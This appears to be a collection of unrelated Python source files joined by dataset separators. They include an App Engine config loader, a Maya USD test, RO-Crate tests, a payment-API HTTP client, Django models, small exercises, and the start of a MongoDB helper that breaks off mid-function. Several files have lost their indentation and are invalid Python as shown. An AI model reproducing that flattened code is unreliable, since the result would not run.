DATASTORE_DEADLINE = 1.5
RESERVED_MARKER = 'ah__conf__'
NAMESPACE = '_' + RESERVED_MARKER
CONFIG_KIND = '_AppEngine_Config'
ACTIVE_KEY_NAME = 'active'
FILENAMES = ['conf.yaml', 'conf.yml']
PARAMETERS = 'parameters'
PARAMETER_NAME_REGEX = '[a-zA-Z][a-zA-Z0-9_]*'
_cached_config = None
class Config(db.Expando):
"""The representation of a config in the datastore and memcache."""
ah__conf__version = db.IntegerProperty(default=0, required=True)
@classmethod
def kind(cls):
"""Override the kind name to prevent collisions with users."""
return CONFIG_KIND
def ah__conf__load_from_yaml(self, parsed_config):
"""Loads all the params from a YAMLConfiguration into expando fields.
We set these expando properties with a special name prefix 'p_' to
keep them separate from the static attributes of Config. That way we
don't have to check elsewhere to make sure the user doesn't stomp on
our built in properties.
Args:
      parsed_config: A YAMLConfiguration.
"""
for key, value in parsed_config.parameters.iteritems():
setattr(self, key, value)
class _ValidParameterName(validation.Validator):
"""Validator to check if a value is a valid config parameter name.
We only allow valid python attribute names without leading underscores
that also do not collide with reserved words in the datastore models.
"""
def __init__(self):
self.regex = validation.Regex(PARAMETER_NAME_REGEX)
def Validate(self, value, key):
"""Check that all parameter names are valid.
This is used as a validator when parsing conf.yaml.
Args:
value: the value to check.
key: A description of the context for which this value is being
validated.
Returns:
The validated value.
"""
value = self.regex.Validate(value, key)
try:
db.check_reserved_word(value)
except db.ReservedWordError:
raise validation.ValidationError(
'The config parameter name %.100r is reserved by db.Model see: '
'https://developers.google.com/appengine/docs/python/datastore/'
'modelclass#Disallowed_Property_Names for details.' % value)
if value.startswith(RESERVED_MARKER):
raise validation.ValidationError(
'The config parameter name %.100r is reserved, as are all names '
'beginning with \'%s\', please choose a different name.' % (
value, RESERVED_MARKER))
return value
class _Scalar(validation.Validator):
"""Validator to check if a value is a simple scalar type.
We only allow scalars that are well supported by both the datastore and YAML.
"""
ALLOWED_PARAMETER_VALUE_TYPES = frozenset(
[bool, int, long, float, str, unicode])
def Validate(self, value, key):
"""Check that all parameters are scalar values.
This is used as a validator when parsing conf.yaml
Args:
value: the value to check.
key: the name of parameter corresponding to this value.
Returns:
We just return value unchanged.
"""
if type(value) not in self.ALLOWED_PARAMETER_VALUE_TYPES:
raise validation.ValidationError(
'Expected scalar value for parameter: %s, but found %.100r which '
'is type %s' % (key, value, type(value).__name__))
return value
class _ParameterDict(validation.ValidatedDict):
"""This class validates the parameters dictionary in YAMLConfiguration.
Keys must look like non-private python identifiers and values
must be a supported scalar. See the class comment for YAMLConfiguration.
"""
KEY_VALIDATOR = _ValidParameterName()
VALUE_VALIDATOR = _Scalar()
class YAMLConfiguration(validation.Validated):
"""This class describes the structure of a conf.yaml file.
  At the top level the file should have a parameters attribute which is a mapping
from strings to scalars. For example:
parameters:
background_color: 'red'
message_size: 1024
boolean_valued_param: true
"""
ATTRIBUTES = {PARAMETERS: _ParameterDict}
def LoadSingleConf(stream):
"""Load a conf.yaml file or string and return a YAMLConfiguration object.
Args:
stream: a file object corresponding to a conf.yaml file, or its contents
as a string.
Returns:
A YAMLConfiguration instance
"""
return yaml_object.BuildSingleObject(YAMLConfiguration, stream)
def _find_yaml_path():
"""Traverse directory trees to find conf.yaml file.
  Begins with the current working directory and then moves up the
  directory structure until the file is found.
Returns:
the path of conf.yaml file or None if not found.
"""
current, last = os.getcwd(), None
while current != last:
for yaml_name in FILENAMES:
yaml_path = os.path.join(current, yaml_name)
if os.path.exists(yaml_path):
return yaml_path
last = current
current, last = os.path.dirname(current), current
return None
def _fetch_from_local_file(pathfinder=_find_yaml_path, fileopener=open):
"""Get the configuration that was uploaded with this version.
Args:
pathfinder: a callable to use for finding the path of the conf.yaml
file. This is only for use in testing.
fileopener: a callable to use for opening a named file. This is
only for use in testing.
Returns:
A config class instance for the options that were uploaded. If there
is no config file, return None
"""
yaml_path = pathfinder()
if yaml_path:
config = Config()
config.ah__conf__load_from_yaml(LoadSingleConf(fileopener(yaml_path)))
logging.debug('Loaded conf parameters from conf.yaml.')
return config
return None
def _get_active_config_key(app_version):
"""Generate the key for the active config record belonging to app_version.
Args:
app_version: the major version you want configuration data for.
Returns:
The key for the active Config record for the given app_version.
"""
return db.Key.from_path(
CONFIG_KIND,
'%s/%s' % (app_version, ACTIVE_KEY_NAME),
namespace=NAMESPACE)
def _fetch_latest_from_datastore(app_version):
"""Get the latest configuration data for this app-version from the datastore.
Args:
app_version: the major version you want configuration data for.
Side Effects:
We populate memcache with whatever we find in the datastore.
Returns:
A config class instance for most recently set options or None if the
query could not complete due to a datastore exception.
"""
rpc = db.create_rpc(deadline=DATASTORE_DEADLINE,
read_policy=db.EVENTUAL_CONSISTENCY)
key = _get_active_config_key(app_version)
config = None
try:
config = Config.get(key, rpc=rpc)
logging.debug('Loaded most recent conf data from datastore.')
except:
logging.warning('Tried but failed to fetch latest conf data from the '
'datastore.')
if config:
memcache.set(app_version, db.model_to_protobuf(config).Encode(),
namespace=NAMESPACE)
logging.debug('Wrote most recent conf data into memcache.')
return config
def _fetch_latest_from_memcache(app_version):
"""Get the latest configuration data for this app-version from memcache.
Args:
app_version: the major version you want configuration data for.
Returns:
A Config class instance for most recently set options or None if none
could be found in memcache.
"""
proto_string = memcache.get(app_version, namespace=NAMESPACE)
if proto_string:
logging.debug('Loaded most recent conf data from memcache.')
return db.model_from_protobuf(proto_string)
logging.debug('Tried to load conf data from memcache, but found nothing.')
return None
def _inspect_environment():
"""Return relevant information from the cgi environment.
This is mostly split out to simplify testing.
Returns:
A tuple: (app_version, conf_version, development)
app_version: the major version of the current application.
conf_version: the current configuration version.
development: a boolean, True if we're running under devappserver.
"""
app_version = os.environ['CURRENT_VERSION_ID'].rsplit('.', 1)[0]
conf_version = int(os.environ.get('CURRENT_CONFIGURATION_VERSION', '0'))
development = os.environ.get('SERVER_SOFTWARE', '').startswith('Development/')
return (app_version, conf_version, development)
def refresh():
"""Update the local config cache from memcache/datastore.
Normally configuration parameters are only refreshed at the start of a
new request. If you have a very long running request, or you just need
the freshest data for some reason, you can call this function to force
a refresh.
"""
app_version, _, _ = _inspect_environment()
global _cached_config
new_config = _fetch_latest_from_memcache(app_version)
if not new_config:
new_config = _fetch_latest_from_datastore(app_version)
if new_config:
_cached_config = new_config
def _new_request():
"""Test if this is the first call to this function in the current request.
This function will return True exactly once for each request
Subsequent calls in the same request will return False.
Returns:
True if this is the first call in a given request, False otherwise.
"""
if RESERVED_MARKER in os.environ:
return False
os.environ[RESERVED_MARKER] = RESERVED_MARKER
return True
def _get_config():
"""Check if the current cached config is stale, and if so update it."""
app_version, current_config_version, development = _inspect_environment()
global _cached_config
if (development and _new_request()) or not _cached_config:
_cached_config = _fetch_from_local_file() or Config()
if _cached_config.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_memcache(app_version)
if not newconfig or newconfig.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_datastore(app_version)
_cached_config = newconfig or _cached_config
return _cached_config
def get(name, default=None):
"""Get the value of a configuration parameter.
This function is guaranteed to return the same value for every call
during a single request.
Args:
name: The name of the configuration parameter you want a value for.
default: A default value to return if the named parameter doesn't exist.
Returns:
The string value of the configuration parameter.
"""
return getattr(_get_config(), name, default)
def get_all():
"""Return an object with an attribute for each conf parameter.
Returns:
An object with an attribute for each conf parameter.
"""
return _get_config()
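# Illustrative usage sketch (not part of this module; assumes a conf.yaml like
# the one in the YAMLConfiguration docstring above has been uploaded with the
# app). Application code reads parameters through get()/get_all().
def _example_usage():
  # 'red' when conf.yaml defines background_color, otherwise the default 'blue'
  color = get('background_color', 'blue')
  size = get('message_size', 0)
  return color, size, get_all()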
|
StarcoderdataPython
|
11398515
|
<reponame>sopvop/maya-usd<filename>plugin/pxr/maya/lib/usdMaya/testenv/testUsdMayaGetVariantSetSelections.py
#!/pxrpythonsubst
#
# Copyright 2016 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pxr import UsdMaya
from maya import cmds
from maya import standalone
import os
import unittest
class testUsdMayaGetVariantSetSelections(unittest.TestCase):
@classmethod
def tearDownClass(cls):
standalone.uninitialize()
@classmethod
def setUpClass(cls):
standalone.initialize('usd')
cmds.loadPlugin('pxrUsd')
cls.usdFile = os.path.abspath('CubeWithVariantsModel.usda')
cls.primPath = '/CubeWithVariantsModel'
def setUp(self):
cmds.file(new=True, force=True)
self.assemblyNodeName = cmds.assembly(name='TestAssemblyNode',
type='pxrUsdReferenceAssembly')
cmds.setAttr('%s.filePath' % self.assemblyNodeName, self.usdFile, type='string')
cmds.setAttr('%s.primPath' % self.assemblyNodeName, self.primPath, type='string')
def _SetSelection(self, variantSetName, variantSelection):
attrName = 'usdVariantSet_%s' % variantSetName
if not cmds.attributeQuery(attrName, node=self.assemblyNodeName, exists=True):
cmds.addAttr(self.assemblyNodeName, ln=attrName, dt='string', internalSet=True)
cmds.setAttr('%s.%s' % (self.assemblyNodeName, attrName), variantSelection, type='string')
def testNoSelections(self):
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {})
def testOneSelection(self):
self._SetSelection('modelingVariant', 'ModVariantB')
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {'modelingVariant': 'ModVariantB'})
def testAllSelections(self):
self._SetSelection('fooVariant', 'FooVariantC')
self._SetSelection('modelingVariant', 'ModVariantB')
self._SetSelection('shadingVariant', 'ShadVariantA')
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections,
{'fooVariant': 'FooVariantC',
'modelingVariant': 'ModVariantB',
'shadingVariant': 'ShadVariantA'})
# Verify that selecting a non-registered variant set affects the
# stage's composition.
prim = UsdMaya.GetPrim(self.assemblyNodeName)
geomPrim = prim.GetChild('Geom')
cubePrim = geomPrim.GetChild('Cube')
attrValue = cubePrim.GetAttribute('variantAttribute').Get()
self.assertEqual(attrValue, 'C')
def testBogusVariantName(self):
self._SetSelection('bogusVariant', 'NotARealVariantSet')
# Invalid variantSet names should not appear in the results.
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {})
def testBogusSelection(self):
self._SetSelection('modelingVariant', 'BogusSelection')
# Selections are NOT validated, so any "selection" for a valid
# variantSet should appear in the results.
variantSetSelections = UsdMaya.GetVariantSetSelections(self.assemblyNodeName)
self.assertEqual(variantSetSelections, {'modelingVariant': 'BogusSelection'})
if __name__ == '__main__':
unittest.main(verbosity=2)
|
StarcoderdataPython
|
9688872
|
<reponame>sourav0220/ro-crate-py<filename>test/test_model.py
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import uuid
from rocrate.rocrate import ROCrate
from rocrate.model.file import File
from rocrate.model.person import Person
def test_dereferencing(test_data_dir, helpers):
crate = ROCrate()
# verify default entities
root_dataset = crate.dereference('./')
assert crate.root_dataset is root_dataset
metadata_entity = crate.dereference(helpers.METADATA_FILE_NAME)
assert crate.metadata is metadata_entity
preview_entity = crate.dereference(helpers.PREVIEW_FILE_NAME)
assert preview_entity is crate.preview
# dereference added files
sample_file = test_data_dir / 'sample_file.txt'
file_returned = crate.add_file(sample_file)
assert isinstance(file_returned, File)
dereference_file = crate.dereference("sample_file.txt")
assert file_returned is dereference_file
def test_dereferencing_equivalent_id(helpers):
crate = ROCrate()
root_dataset = crate.dereference('./')
assert crate.root_dataset is root_dataset
root_dataset = crate.dereference('')
assert crate.root_dataset is root_dataset
metadata_entity = crate.dereference(helpers.METADATA_FILE_NAME)
assert crate.metadata is metadata_entity
metadata_entity = crate.dereference(f'./{helpers.METADATA_FILE_NAME}')
assert crate.metadata is metadata_entity
def test_contextual_entities():
crate = ROCrate()
new_person = crate.add_person('#joe', {'name': '<NAME>'})
person_dereference = crate.dereference('#joe')
assert person_dereference is new_person
assert person_dereference.type == 'Person'
person_prop = person_dereference.properties()
assert person_prop['@type'] == 'Person'
assert person_prop['name'] == '<NAME>'
assert not new_person.datePublished
def test_properties():
crate = ROCrate()
crate_name = "new crate"
crate.name = crate_name
assert crate.name == crate_name
crate_description = "this is a new crate"
crate.description = crate_description
assert crate.description == crate_description
assert crate.datePublished == crate.root_dataset.datePublished
assert isinstance(crate.root_dataset.datePublished, datetime.datetime)
assert isinstance(crate.root_dataset["datePublished"], str)
crate_datePublished = datetime.datetime.now()
crate.datePublished = crate_datePublished
assert crate.datePublished == crate_datePublished
new_person = crate.add_person('#001', {'name': '<NAME>'})
crate.creator = new_person
assert crate.creator is new_person
assert isinstance(crate.creator, Person)
assert crate.creator['name'] == '<NAME>'
assert crate.creator.type == 'Person'
new_person2 = crate.add_person('#002', {'name': '<NAME>'})
crate.creator = [new_person, new_person2]
assert isinstance(crate.creator, list)
assert crate.creator[0] is new_person
assert crate.creator[1] is new_person2
def test_uuid():
crate = ROCrate()
new_person = crate.add_person(name="No Identifier")
jsonld = new_person.as_jsonld()
assert "Person" == jsonld["@type"]
assert jsonld["@id"].startswith("#")
# Check it made a valid UUIDv4
u = uuid.UUID(jsonld["@id"][1:])
assert 4 == u.version
|
StarcoderdataPython
|
5103060
|
#!/bin/python
from __future__ import absolute_import, division, unicode_literals
import sys
try:
import requests
except ImportError:
requests = None
try:
import pycurl
except ImportError:
pycurl = None
try:
# Python 3
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import HTTPError
except ImportError:
# Python 2
from urllib import urlencode
from urllib2 import Request, urlopen, HTTPError
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import BytesIO
import json as json_lib
import base64
class HTTPClient(object):
def __init__(self, app_name, user_agent_suffix,
lib_version, force_request=None):
# Check if requests already available, default to urllib
self.user_agent = app_name + " " + user_agent_suffix + lib_version
# In case the app_name is empty
self.user_agent = self.user_agent.strip()
if not force_request:
if requests:
self.request = self._requests_post
elif pycurl:
self.request = self._pycurl_post
else:
self.request = self._urllib_post
else:
if force_request == 'requests':
self.request = self._requests_post
elif force_request == 'pycurl':
self.request = self._pycurl_post
else:
self.request = self._urllib_post
def _pycurl_post(self,
url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using pycurl. returning
        an AdyenResult object on a 200 HTTP response. Either json or data has to
be provided. If username and password are provided, basic auth will be
used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure
of key/value of request to place
username (str, optional): Username for basic auth. Must be included
as part of password.
password (str, optional): Password for basic auth. Must be included
as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
response_headers = {}
curl = pycurl.Curl()
curl.setopt(curl.URL, url)
if sys.version_info[0] >= 3:
stringbuffer = BytesIO()
else:
stringbuffer = StringIO()
curl.setopt(curl.WRITEDATA, stringbuffer)
# Add User-Agent header to request so that the
# request can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
if username and password:
curl.setopt(curl.USERPWD, '%<PASSWORD>' % (username, password))
elif xapikey:
headers["X-API-KEY"] = xapikey
# Convert the header dict to formatted array as pycurl needs.
if sys.version_info[0] >= 3:
header_list = ["%s:%s" % (k, v) for k, v in headers.items()]
else:
header_list = ["%s:%s" % (k, v) for k, v in headers.iteritems()]
# Ensure proper content-type when adding headers
if json:
header_list.append("Content-Type:application/json")
curl.setopt(pycurl.HTTPHEADER, header_list)
# Return regular dict instead of JSON encoded dict for request:
raw_store = json
# Set the request body.
raw_request = json_lib.dumps(json) if json else urlencode(data)
curl.setopt(curl.POSTFIELDS, raw_request)
curl.setopt(curl.TIMEOUT, timeout)
curl.perform()
# Grab the response content
result = stringbuffer.getvalue()
status_code = curl.getinfo(curl.RESPONSE_CODE)
curl.close()
# Return regular dict instead of JSON encoded dict for request:
raw_request = raw_store
return result, raw_request, status_code, response_headers
def _requests_post(self, url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using requests.
Returning an AdyenResult object on 200 HTTP response.
Either json or data has to be provided.
If username and password are provided, basic auth will be used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of key/value
of request to place
            username (str, optional): Username for basic auth. Must be included
as part of password.
password (str, optional): Password for basic auth. Must be included
as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
# Adding basic auth if username and password provided.
auth = None
if username and password:
auth = requests.auth.HTTPBasicAuth(username, password)
elif xapikey:
headers['x-api-key'] = xapikey
# Add User-Agent header to request so that the request
# can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
request = requests.post(url, auth=auth, data=data, json=json,
headers=headers, timeout=timeout)
# Ensure either json or data is returned for raw request
# Updated: Only return regular dict,
# don't switch out formats if this is not important.
message = json
return request.text, message, request.status_code, request.headers
def _urllib_post(self, url,
json=None,
data=None,
username="",
password="",
xapikey="",
headers=None,
timeout=30):
"""This function will POST to the url endpoint using urllib2. returning
        an AdyenResult object on a 200 HTTP response. Either json or data has to
be provided. If username and password are provided, basic auth will be
used.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of
key/value of request to place as
www-form
username (str, optional): Username for basic auth. Must be
                included as part of password.
password (str, optional): Password for basic auth. Must be
included as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
headers (dict, optional): Key/Value pairs of headers to include
timeout (int, optional): Default 30. Timeout for the request.
Returns:
str: Raw response received
str: Raw request placed
int: HTTP status code, eg 200,404,401
dict: Key/Value pairs of the headers received.
"""
if headers is None:
headers = {}
# Store regular dict to return later:
raw_store = json
raw_request = json_lib.dumps(json) if json else urlencode(data)
url_request = Request(url, data=raw_request.encode('utf8'))
if json:
url_request.add_header('Content-Type', 'application/json')
elif not data:
raise ValueError("Please provide either a json or a data field.")
# Add User-Agent header to request so that the
# request can be identified as coming from the Adyen Python library.
headers['User-Agent'] = self.user_agent
# Set regular dict to return as raw_request:
raw_request = raw_store
        # Adding basic auth if username and password provided.
if username and password:
if sys.version_info[0] >= 3:
basic_authstring = base64.encodebytes(('%s:%s' %
(username, password))
.encode()).decode(). \
replace('\n', '')
else:
basic_authstring = base64.encodestring('%s:%s' % (username,
password)). \
replace('\n', '')
url_request.add_header("Authorization",
"Basic %s" % basic_authstring)
elif xapikey:
headers["X-API-KEY"] = xapikey
# Adding the headers to the request.
for key, value in headers.items():
url_request.add_header(key, str(value))
        # urllib raises all non-200 responses as an error.
try:
response = urlopen(url_request, timeout=timeout)
except HTTPError as e:
raw_response = e.read()
return raw_response, raw_request, e.getcode(), e.headers
else:
raw_response = response.read()
response.close()
# The dict(response.info()) is the headers of the response
# Raw response, raw request, status code and headers returned
return (raw_response, raw_request,
response.getcode(), dict(response.info()))
def request(self, url,
json="",
data="",
username="",
password="",
headers=None,
                timeout=30):
"""This is overridden on module initialization. This function will make
an HTTP POST to a given url. Either json/data will be what is posted to
        the endpoint. The HTTP request needs to be basicAuth when username and
password are provided. a headers dict maybe provided,
whatever the values are should be applied.
Args:
url (str): url to send the POST
json (dict, optional): Dict of the JSON to POST
data (dict, optional): Dict, presumed flat structure of
key/value of request to place as
www-form
username (str, optional): Username for basic auth. Must be
                                       included as part of password.
password (str, optional): Password for basic auth. Must be
included as part of username.
xapikey (str, optional): Adyen API key. Will be used for auth
if username and password are absent.
            headers (dict, optional): Key/Value pairs of headers to include
            timeout (int, optional): Default 30. Timeout for the request.
        Returns:
            str: Raw request placed
            str: Raw response received
            int: HTTP status code, eg 200,404,401
            dict: Key/Value pairs of the headers received.
"""
raise NotImplementedError('request of HTTPClient should have been '
'overridden on initialization. '
'Otherwise, can be overridden to '
'supply your own post method')
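# Illustrative usage sketch (not part of the library): the URL and credentials
# below are placeholders. self.request is bound to one of the *_post
# implementations in __init__, so every backend shares this call shape.
def _example_usage():
    client = HTTPClient(app_name="ExampleApp",
                        user_agent_suffix="example-lib/",
                        lib_version="1.0.0")
    raw_response, raw_request, status_code, resp_headers = client.request(
        "https://example.com/api/endpoint",
        json={"hello": "world"},
        username="ws_user",
        password="<PASSWORD>",
        timeout=30)
    return status_code, raw_response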
|
StarcoderdataPython
|
3210862
|
import os
from django.db import models
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from applications.alumniprofile.models import Profile
from applications.events_news.models import Event
from applications.gallery.models import Album
def upload_photo(instance, filename):
name, extension = os.path.splitext(filename)
return 'Chapter_Walls/' + str(instance.name) + ".jpg"
class Constants:
POST = (
('President', 'President'),
('Hon. Secretary', 'Hon. Secretary'),
('Treasurer', 'Treasurer'),
('Other', 'Other')
)
class Chapters(models.Model):
name = models.CharField(max_length=100)
description = RichTextUploadingField(blank=True, null=True)
wall_picture = models.ImageField(null=True, blank=True, upload_to=upload_photo)
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class ChapterTeam(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.PROTECT)
user = models.ForeignKey(User, on_delete=models.PROTECT)
post = models.CharField(choices=Constants.POST, max_length=50)
other_post = models.CharField(max_length=100, blank=True, null=True)
def __str__(self):
return 'Chapter: ' + str(self.chapter) + ' User: ' + str(self.user) + ' Post: ' + str(self.post)
class ChapterEvent(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.CASCADE)
event = models.ForeignKey(Event, on_delete=models.CASCADE)
class Meta:
unique_together = (('chapter', 'event'),)
def __str__(self):
return 'Chapter: ' + str(self.chapter) + ' Event: ' + str(self.event)
class ChapterAlbum(models.Model):
chapter = models.ForeignKey(Chapters, on_delete=models.CASCADE)
album = models.ForeignKey(Album, on_delete=models.CASCADE)
class Meta:
unique_together = (('chapter', 'album'),)
def __str__(self):
        return 'Chapter: ' + str(self.chapter) + ' Album: ' + str(self.album)
|
StarcoderdataPython
|
3444815
|
<filename>year1/python/week3/q24_rot13.py
### This program uses ROT13 encryption, a variant of the Caesar cipher used in the first century ###
import string
def substituteCharacter(uncryp):
encryp_const = 13
## One possible method to code this function is shown below but requires more lines
## alphabet = list(string.ascii_lowercase)
##
## str1 = alphabet[:encryp_const]
## str2 = alphabet[encryp_const:]
##
## zipped = zip(str1,str2)
## encryp = dict(zipped)
##
char = ord('a') # Starting character
d = {chr(char):chr(char+encryp_const) for char in range(char, char + encryp_const)}
if(uncryp in d):
cryp = d[uncryp]
return cryp
    elif(ord(uncryp) < char or ord(uncryp) >= (char + 2*len(d))):
return 'Invalid Input'
else:
uncryp = ord(uncryp) - encryp_const
cryp = chr(uncryp)
return cryp
uncryp = input("WeLcOmE tO cRyPtIc VeRsIoN x.Y.z! PlEaSe InPuT a ChArAcTeR: ")
cryp = substituteCharacter(uncryp)
print("An uncryptic \'{}\' generates a cryptic \'{}\'".format(uncryp, cryp))
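# Illustrative check (not part of the original exercise): ROT13 is its own
# inverse, so applying substituteCharacter twice returns the original letter.
def rot13RoundTrip(letter):
    once = substituteCharacter(letter)
    twice = substituteCharacter(once)
    return once, twice
# e.g. rot13RoundTrip('a') -> ('n', 'a')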
|
StarcoderdataPython
|
1635651
|
from thinsos.core import SOS
|
StarcoderdataPython
|
11323212
|
<gh_stars>10-100
from ..decorators import stere_performer
from ..field import Field
@stere_performer('null_action', consumes_arg=False)
class Root(Field):
"""A simple wrapper over Field, it does not implement a performer method.
Although Root has no specific behaviour, it can be useful when declaring a
root for an Area or RepeatingArea.
Example:
>>> from stere.areas import RepeatingArea
>>> from stere.fields import Root
>>>
>>>
>>> collections = RepeatingArea(
>>> root=Root('xpath', '//table/tr'),
>>> quantity=Text('css', '.collection_qty'),
>>> )
"""
pass
|
StarcoderdataPython
|
8164983
|
import cv2 as cv
src = cv.imread("D:/Images/lena.jpg")
cv.namedWindow("src", cv.WINDOW_AUTOSIZE)
src = cv.cvtColor(src, cv.COLOR_BGR2GRAY)
cv.imshow("src", src)
# Only sigmaX is specified; sigmaY defaults to sigmaX
dst1 = cv.blur(src, (5, 5), anchor=(-1, -1), borderType=4)
dst2 = cv.GaussianBlur(src, (5, 5), 15, borderType=4)
dst3 = cv.GaussianBlur(src, (0, 0), 15)
cv.imshow("blur ksize=5", dst1)
cv.imshow("gaussian ksize=5", dst2)
cv.imshow("gaussian sigma=15", dst3)
cv.waitKey(0)
cv.destroyAllWindows()
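# Illustrative sketch (not part of the original demo): when ksize is (0, 0),
# as in dst3 above, OpenCV derives the kernel size from sigma; conversely,
# cv.getGaussianKernel exposes the 1-D kernel used for the separable filter.
kernel_1d = cv.getGaussianKernel(5, 15)  # 5-tap Gaussian kernel with sigma = 15
print(kernel_1d.ravel())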
|
StarcoderdataPython
|
8176071
|
import logging
log = logging.getLogger(__name__)
try:
from PyQt4 import QtCore as QtCore_
from PyQt4 import QtGui as QtGui_
from PyQt4.QtCore import pyqtSlot as Slot, pyqtSignal as Signal
except ImportError:
from PySide import QtCore as QtCore_
from PySide import QtGui as QtGui_
from PySide.QtCore import Slot, Signal
QtCore = QtCore_
QtGui = QtGui_
Qt = QtCore_.Qt
__all__ = ['QtCore', 'QtGui', 'Qt', 'Signal', 'Slot']
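# Illustrative sketch (not part of the original shim): downstream code can rely
# on the unified names regardless of which binding was imported above.
class _ExampleEmitter(QtCore.QObject):
    # a signal declared through the re-exported Signal name
    valueChanged = Signal(int)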
|
StarcoderdataPython
|
1892363
|
<reponame>AdrianaViabL/Curso-Python-udemy<filename>3 - python POO/113 - docstrings/uma_linha.py
"""documento de uma linha"""
variavel = 'valor'
def funcao():
return 2
|
StarcoderdataPython
|
11359990
|
<filename>udp/test.py
#!/usr/bin/env python3
while True:
try:
user_input = input("username: ")
if not user_input:
raise ValueError('empty string')
else:
break
except ValueError as e:
print(e)
|
StarcoderdataPython
|
114400
|
<reponame>aleasims/Peach
def Test(tester):
from Ft.Lib.DbUtil import EscapeQuotes
for i,out in [('hello','hello'),
("he'llo",r"he\'llo"),
("he'll'o",r"he\'ll\'o"),
("'hello'",r"\'hello\'"),
("'","\\'"),
(r"hhh\\hhhh",r"hhh\\\\hhhh"),
(r"\\",r"\\\\"),
(r"'\\''\\'\\'",r"\'\\\\\'\'\\\\\'\\\\\'"),
(None,r""),
]:
tester.startTest(repr(i))
e = EscapeQuotes(i)
tester.compare(out,e)
tester.testDone()
|
StarcoderdataPython
|
1852353
|
'''STUDENT: <NAME>
EXERCISE 06: Merge k Sorted Lists'''
# DESCRIPTION: RECEIVES AN ARRAY OF K LINKED LISTS; EACH LINKED LIST IS SORTED IN ASCENDING ORDER AND THEY ARE MERGED INTO A SINGLE LIST.
import queue
def MergeList(lista):
    priority_queue = queue.PriorityQueue() # CREATE THE PRIORITY QUEUE
    response = [] # CREATE THE RESULTING ARRAY
    for i in lista:
        for j in i: # PUSH EACH ELEMENT OF THE LIST WITH ITS PRIORITY
            priority_queue.put(j)
    while not priority_queue.empty(): # MERGE THE LISTS INTO A SINGLE ONE
response.append(priority_queue.get())
return response
# TEST CASES
def main():
print("[[1,4,5],[1,3,4],[2,6]]")
print(MergeList([[1,4,5],[1,3,4],[2,6]]))
print("[[1,4,5],[1,3,4],[2,6],[7,8]]")
print(MergeList([[1,4,5],[1,3,4],[2,6],[7,8]]))
main()
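# Alternative sketch (not part of the original exercise; assumes each inner
# list is already sorted, as in the problem statement): heapq.merge performs a
# streaming k-way merge instead of flattening everything into a PriorityQueue.
import heapq
def merge_with_heapq(lists):
    return list(heapq.merge(*lists))
# merge_with_heapq([[1,4,5],[1,3,4],[2,6]]) -> [1, 1, 2, 3, 4, 4, 5, 6]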
|
StarcoderdataPython
|
3220616
|
<gh_stars>10-100
from repldex.backend.typings import DatabaseEntry, DatabaseHistoryItem, PartialDatabaseEntry
from typing import Any, Dict, List, Optional, Union
from datetime import datetime
import motor.motor_asyncio
import uuid
import os
connection_uri = os.getenv('dburi')
client = motor.motor_asyncio.AsyncIOMotorClient(connection_uri, connectTimeoutMS=1000) # timeout is 1 sec
db = client['repldex']
entries_coll = db['entries']
sessions_coll = db['sessions']
users_coll = db['users']
config_coll = db['config']
from repldex.discordbot import bot as discordbot
from repldex.backend import images
from repldex import utils
async def fix_entry(data: Any) -> Optional[DatabaseEntry]:
'''Fix entries by adding missing fields.'''
if data is None:
return
original_data = dict(data)
if data.get('image') and isinstance(data['image'], str):
